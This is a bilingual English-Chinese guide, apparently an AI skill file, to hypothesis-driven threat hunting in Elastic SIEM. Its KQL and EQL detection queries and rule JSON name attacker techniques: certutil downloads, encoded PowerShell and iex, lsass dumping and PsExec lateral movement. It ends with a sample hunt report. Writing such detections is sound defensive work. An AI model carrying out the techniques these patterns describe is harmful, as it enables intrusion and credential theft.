performing-threat-hunting-with-elastic-siem
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChinesePerforming Threat Hunting with Elastic SIEM
使用Elastic SIEM开展威胁狩猎
When to Use
适用场景
Use this skill when:
- SOC teams need to proactively search for threats not caught by existing detection rules
- Threat intelligence reports describe new TTPs requiring validation against historical data
- Red team exercises reveal detection gaps that need hunting query development
- Periodic hunting cadence requires structured hypothesis-driven investigations
Do not use for real-time alert triage — that belongs in the Elastic Security Alerts queue with automated detection rules.
以下场景适用本技能:
- SOC团队需要主动搜索现有检测规则未捕获的威胁
- 威胁情报报告描述了新的TTP,需要针对历史数据进行验证
- 红队演练暴露了检测缺口,需要开发狩猎查询
- 定期狩猎节奏需要结构化的假设驱动型调查
请勿用于实时告警分诊——该场景属于Elastic Security告警队列的自动检测规则范畴。
Prerequisites
前提条件
- Elastic Security 8.x+ with Security app enabled in Kibana
- Data ingestion via Elastic Agent (Endpoint Security integration) or Beats (Winlogbeat, Filebeat, Packetbeat)
- Data normalized to Elastic Common Schema (ECS) field mappings
- User role with and
kibana_security_solutionaccess to relevant indicesread - MITRE ATT&CK framework knowledge for hypothesis generation
- 启用Kibana中Security应用的Elastic Security 8.x+
- 通过Elastic Agent(Endpoint Security集成)或Beats(Winlogbeat、Filebeat、Packetbeat)进行数据采集
- 数据已标准化为Elastic Common Schema(ECS)字段映射
- 用户角色拥有权限及相关索引的
kibana_security_solution访问权限read - 具备MITRE ATT&CK框架知识以生成假设
Workflow
工作流程
Step 1: Develop Hunting Hypothesis
步骤1:制定狩猎假设
Start with a hypothesis based on threat intelligence, ATT&CK technique, or anomaly:
Example Hypothesis: "Attackers are using living-off-the-land binaries (LOLBins) for execution, specifically certutil.exe for file downloads (T1105 — Ingress Tool Transfer)."
Define scope:
- Data sources: ,
logs-endpoint.events.process-*logs-windows.sysmon_operational-* - Time range: Last 30 days
- Expected indicators: certutil.exe with ,
-urlcache, or-splitflags-decode
基于威胁情报、ATT&CK技术或异常情况提出假设:
示例假设:“攻击者正在使用原生系统二进制文件(LOLBins)执行攻击,具体是利用certutil.exe进行文件下载(T1105 — 入口工具传输)。”
定义范围:
- 数据源:、
logs-endpoint.events.process-*logs-windows.sysmon_operational-* - 时间范围:最近30天
- 预期指标:带有、
-urlcache或-split参数的certutil.exe-decode
Step 2: Hunt Using KQL in Discover
步骤2:在Discover中使用KQL进行狩猎
Open Kibana Discover and query with KQL (Kibana Query Language):
kql
process.name: "certutil.exe" and process.args: ("-urlcache" or "-split" or "-decode" or "-encode" or "-verifyctl")Refine to exclude known legitimate use:
kql
process.name: "certutil.exe"
and process.args: ("-urlcache" or "-split" or "-decode")
and not process.parent.name: ("sccm*.exe" or "ccmexec.exe")
and not user.name: "SYSTEM"For PowerShell-based hunting with encoded commands (T1059.001):
kql
process.name: "powershell.exe"
and process.args: ("-enc" or "-encodedcommand" or "-e " or "frombase64string" or "iex" or "invoke-expression")
and not process.parent.executable: "C:\\Windows\\System32\\svchost.exe"打开Kibana Discover并使用KQL(Kibana Query Language)查询:
kql
process.name: "certutil.exe" and process.args: ("-urlcache" or "-split" or "-decode" or "-encode" or "-verifyctl")优化查询以排除已知合法使用场景:
kql
process.name: "certutil.exe"
and process.args: ("-urlcache" or "-split" or "-decode")
and not process.parent.name: ("sccm*.exe" or "ccmexec.exe")
and not user.name: "SYSTEM"针对基于PowerShell的编码命令狩猎(T1059.001):
kql
process.name: "powershell.exe"
and process.args: ("-enc" or "-encodedcommand" or "-e " or "frombase64string" or "iex" or "invoke-expression")
and not process.parent.executable: "C:\\Windows\\System32\\svchost.exe"Step 3: Use EQL for Sequence Detection
步骤3:使用EQL进行序列检测
Elastic Event Query Language (EQL) enables hunting for multi-step attack sequences:
Detect parent-child process anomalies (T1055 — Process Injection):
eql
sequence by host.name with maxspan=5m
[process where event.type == "start" and process.name == "explorer.exe"]
[process where event.type == "start" and process.parent.name == "explorer.exe"
and process.name in ("cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe")]Detect credential dumping sequence (T1003):
eql
sequence by host.name with maxspan=2m
[process where event.type == "start"
and process.name in ("procdump.exe", "procdump64.exe", "rundll32.exe", "taskmgr.exe")
and process.args : "*lsass*"]
[file where event.type == "creation"
and file.extension in ("dmp", "dump", "bin")]Detect lateral movement via PsExec (T1021.002):
eql
sequence by source.ip with maxspan=1m
[authentication where event.outcome == "success" and winlog.logon.type == "Network"]
[process where event.type == "start"
and process.name == "psexesvc.exe"]Elastic事件查询语言(EQL)可用于狩猎多步骤攻击序列:
检测父子进程异常(T1055 — 进程注入):
eql
sequence by host.name with maxspan=5m
[process where event.type == "start" and process.name == "explorer.exe"]
[process where event.type == "start" and process.parent.name == "explorer.exe"
and process.name in ("cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe")]检测凭证转储序列(T1003):
eql
sequence by host.name with maxspan=2m
[process where event.type == "start"
and process.name in ("procdump.exe", "procdump64.exe", "rundll32.exe", "taskmgr.exe")
and process.args : "*lsass*"]
[file where event.type == "creation"
and file.extension in ("dmp", "dump", "bin")]检测通过PsExec进行横向移动(T1021.002):
eql
sequence by source.ip with maxspan=1m
[authentication where event.outcome == "success" and winlog.logon.type == "Network"]
[process where event.type == "start"
and process.name == "psexesvc.exe"]Step 4: Investigate with Elastic Security Timeline
步骤4:使用Elastic Security时间线进行调查
Create a Timeline investigation in Elastic Security for collaborative analysis:
- Navigate to Security > Timelines > Create new timeline
- Add events from hunting queries using "Add to timeline" from Discover
- Pin critical events and add investigation notes
- Use the Timeline query bar for additional filtering:
kql
host.name: "WORKSTATION-042" and event.category: ("process" or "network" or "file")Add columns for key fields: , , , , , ,
@timestampevent.actionprocess.nameprocess.argsuser.namesource.ipdestination.ip在Elastic Security中创建时间线调查以进行协作分析:
- 导航至 Security > Timelines > Create new timeline
- 从Discover中使用“添加到时间线”功能将狩猎查询的事件添加进来
- 固定关键事件并添加调查备注
- 使用时间线查询栏进行额外过滤:
kql
host.name: "WORKSTATION-042" and event.category: ("process" or "network" or "file")添加关键字段列:、、、、、、
@timestampevent.actionprocess.nameprocess.argsuser.namesource.ipdestination.ipStep 5: Build Detection Rules from Findings
步骤5:根据发现构建检测规则
Convert successful hunting queries into Elastic detection rules:
json
{
"name": "Certutil Download Activity",
"description": "Detects certutil.exe used for file download, a common LOLBin technique",
"risk_score": 73,
"severity": "high",
"type": "eql",
"query": "process where event.type == \"start\" and process.name == \"certutil.exe\" and process.args : (\"-urlcache\", \"-split\", \"-decode\") and not process.parent.name : (\"ccmexec.exe\", \"sccm*.exe\")",
"threat": [
{
"framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0011",
"name": "Command and Control"
},
"technique": [
{
"id": "T1105",
"name": "Ingress Tool Transfer"
}
]
}
],
"tags": ["Hunting", "LOLBins", "T1105"],
"interval": "5m",
"from": "now-6m",
"enabled": true
}Deploy via Elastic Security API:
bash
curl -X POST "https://kibana:5601/api/detection_engine/rules" \
-H "kbn-xsrf: true" \
-H "Content-Type: application/json" \
-H "Authorization: ApiKey YOUR_API_KEY" \
-d @certutil_rule.json将成功的狩猎查询转换为Elastic检测规则:
json
{
"name": "Certutil Download Activity",
"description": "Detects certutil.exe used for file download, a common LOLBin technique",
"risk_score": 73,
"severity": "high",
"type": "eql",
"query": "process where event.type == \"start\" and process.name == \"certutil.exe\" and process.args : (\"-urlcache\", \"-split\", \"-decode\") and not process.parent.name : (\"ccmexec.exe\", \"sccm*.exe\")",
"threat": [
{
"framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0011",
"name": "Command and Control"
},
"technique": [
{
"id": "T1105",
"name": "Ingress Tool Transfer"
}
]
}
],
"tags": ["Hunting", "LOLBins", "T1105"],
"interval": "5m",
"from": "now-6m",
"enabled": true
}通过Elastic Security API部署:
bash
curl -X POST "https://kibana:5601/api/detection_engine/rules" \
-H "kbn-xsrf: true" \
-H "Content-Type: application/json" \
-H "Authorization: ApiKey YOUR_API_KEY" \
-d @certutil_rule.jsonStep 6: Aggregate and Visualize Findings
步骤6:汇总并可视化发现结果
Create hunting dashboard with aggregations:
json
GET logs-endpoint.events.process-*/_search
{
"size": 0,
"query": {
"bool": {
"must": [
{"term": {"process.name": "certutil.exe"}},
{"range": {"@timestamp": {"gte": "now-30d"}}}
]
}
},
"aggs": {
"by_host": {
"terms": {"field": "host.name", "size": 20},
"aggs": {
"by_user": {
"terms": {"field": "user.name", "size": 10}
},
"by_args": {
"terms": {"field": "process.args", "size": 10}
}
}
}
}
}创建带有聚合功能的狩猎仪表板:
json
GET logs-endpoint.events.process-*/_search
{
"size": 0,
"query": {
"bool": {
"must": [
{"term": {"process.name": "certutil.exe"}},
{"range": {"@timestamp": {"gte": "now-30d"}}}
]
}
},
"aggs": {
"by_host": {
"terms": {"field": "host.name", "size": 20},
"aggs": {
"by_user": {
"terms": {"field": "user.name", "size": 10}
},
"by_args": {
"terms": {"field": "process.args", "size": 10}
}
}
}
}
}Step 7: Document Hunt and Close Loop
步骤7:记录狩猎过程并闭环
Record findings in a structured hunt report and update detection coverage:
- Hypothesis validated or refuted
- IOCs and affected hosts discovered
- Detection rules created or updated
- ATT&CK Navigator layer updated with new coverage
- Recommendations for security control improvements
将发现结果记录在结构化狩猎报告中,并更新检测覆盖范围:
- 假设是否验证成立
- 发现的IOC及受影响主机
- 创建或更新的检测规则
- 使用新覆盖范围更新ATT&CK Navigator图层
- 安全控制改进建议
Key Concepts
核心概念
| Term | Definition |
|---|---|
| KQL | Kibana Query Language — simplified query syntax for filtering data in Kibana Discover and dashboards |
| EQL | Event Query Language — Elastic's sequence-aware query language for detecting multi-step attack patterns |
| ECS | Elastic Common Schema — standardized field naming convention enabling cross-source correlation |
| Timeline | Elastic Security investigation workspace for collaborative event analysis and annotation |
| Hypothesis-Driven Hunting | Structured approach starting with a theory about attacker behavior, tested against telemetry data |
| LOLBins | Living Off the Land Binaries — legitimate Windows tools (certutil, mshta, rundll32) abused by attackers |
| 术语 | 定义 |
|---|---|
| KQL | Kibana查询语言——用于在Kibana Discover和仪表盘中过滤数据的简化查询语法 |
| EQL | 事件查询语言——Elastic的序列感知查询语言,用于检测多步骤攻击模式 |
| ECS | Elastic通用架构——标准化字段命名规范,支持跨数据源关联 |
| Timeline | Elastic Security调查工作区,用于协作式事件分析和注释 |
| Hypothesis-Driven Hunting | 结构化方法,从关于攻击者行为的理论出发,通过遥测数据进行验证 |
| LOLBins | 原生系统二进制文件——被攻击者滥用的合法Windows工具(certutil、mshta、rundll32等) |
Tools & Systems
工具与系统
- Elastic Security: SIEM platform built on Elasticsearch with detection rules, Timeline, and case management
- Elastic Agent: Unified data collection agent replacing Beats for endpoint and network telemetry
- Elastic Endpoint Security: EDR capabilities integrated into Elastic Agent for process, file, and network monitoring
- ATT&CK Navigator: MITRE tool for tracking detection and hunting coverage across the ATT&CK matrix
- Elastic Security: 基于Elasticsearch构建的SIEM平台,包含检测规则、时间线和案例管理功能
- Elastic Agent: 统一数据采集代理,替代Beats用于端点和网络遥测数据采集
- Elastic Endpoint Security: 集成到Elastic Agent中的EDR功能,用于进程、文件和网络监控
- ATT&CK Navigator: MITRE工具,用于跟踪ATT&CK矩阵中的检测和狩猎覆盖范围
Common Scenarios
常见场景
- LOLBin Abuse: Hunt for mshta.exe, regsvr32.exe, rundll32.exe, certutil.exe with suspicious arguments
- Persistence Mechanisms: Query for scheduled task creation, registry run key modification, WMI subscriptions
- C2 Beaconing: Analyze network flow data for periodic outbound connections with consistent intervals
- Data Staging: Hunt for large file compression (7z, rar, zip) followed by outbound transfers
- Account Manipulation: Search for net.exe user creation, group membership changes, or password resets by non-admin users
- LOLBins滥用: 狩猎带有可疑参数的mshta.exe、regsvr32.exe、rundll32.exe、certutil.exe
- 持久化机制: 查询计划任务创建、注册表启动项修改、WMI订阅
- C2信标: 分析网络流量数据,寻找具有一致间隔的定期出站连接
- 数据暂存: 狩猎大文件压缩(7z、rar、zip)后进行出站传输的行为
- 账户操纵: 搜索非管理员用户创建net.exe用户、修改组成员身份或重置密码的操作
Output Format
输出格式
THREAT HUNT REPORT — TH-2024-012
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Hypothesis: Attackers using certutil.exe for tool download (T1105)
Period: 2024-02-15 to 2024-03-15
Data Sources: Elastic Endpoint (process events), Sysmon
Findings:
Total certutil executions: 342
With -urlcache flag: 12 (3.5%)
Suspicious (non-SCCM): 3 confirmed anomalous
Affected Hosts:
WORKSTATION-042 (Finance) — certutil downloading payload.exe from external IP
SERVER-DB-03 (Database) — certutil decoding base64 encoded binary
LAPTOP-EXEC-07 (Executive) — certutil downloading script from Pastebin
Actions Taken:
[DONE] 3 hosts isolated for forensic investigation
[DONE] Detection rule "Certutil Download Activity" deployed (ID: elastic-th012)
[DONE] ATT&CK Navigator updated: T1105 coverage = GREEN
Verdict: HYPOTHESIS CONFIRMED — 3 true positive findings escalated to IRTHREAT HUNT REPORT — TH-2024-012
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Hypothesis: Attackers using certutil.exe for tool download (T1105)
Period: 2024-02-15 to 2024-03-15
Data Sources: Elastic Endpoint (process events), Sysmon
Findings:
Total certutil executions: 342
With -urlcache flag: 12 (3.5%)
Suspicious (non-SCCM): 3 confirmed anomalous
Affected Hosts:
WORKSTATION-042 (Finance) — certutil downloading payload.exe from external IP
SERVER-DB-03 (Database) — certutil decoding base64 encoded binary
LAPTOP-EXEC-07 (Executive) — certutil downloading script from Pastebin
Actions Taken:
[DONE] 3 hosts isolated for forensic investigation
[DONE] Detection rule "Certutil Download Activity" deployed (ID: elastic-th012)
[DONE] ATT&CK Navigator updated: T1105 coverage = GREEN
Verdict: HYPOTHESIS CONFIRMED — 3 true positive findings escalated to IR